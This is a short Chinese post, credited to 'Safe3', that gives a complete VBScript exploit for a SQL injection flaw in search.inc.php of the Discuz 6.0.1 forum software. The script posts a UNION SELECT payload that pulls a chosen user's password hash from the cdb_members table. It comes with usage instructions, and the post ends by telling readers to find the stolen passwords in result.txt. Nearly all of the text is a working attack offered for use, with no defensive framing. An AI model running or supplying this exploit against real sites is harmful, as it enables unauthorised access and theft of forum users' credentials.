作者：Safe3 原文链接 本打算考虑写个python版的，考虑大家的机器环境还是弄了个vbs版 也利于修改 以下是search.inc.php 文件漏洞利用代码VBS版 Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) strUid=Args(2) End If strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "POST",strSite & strPath & "index.php", False objXML.SetRequestHeader "Accept", "*/*" objXML.SetRequestHeader "Accept-Language", "zh-cn" objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" objXML.SetRequestHeader "User-Agent", "wap" objXML.send(strUrl) wscript.echo(objXML.ResponseText) Sub showB() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("Exploit discuz6.0.1") .Echo("Code By Safe3") .Echo("+--------------------------=====================------------------------------+") End with End Sub Sub showU() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("用法:") .Echo(" cscript "&.ScriptName&" site path uid") .Echo("例子:") .Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt") .Echo("+--------------------------=====================------------------------------+") .Quit End with End Sub 获得的密码大家自己在result.txt中查找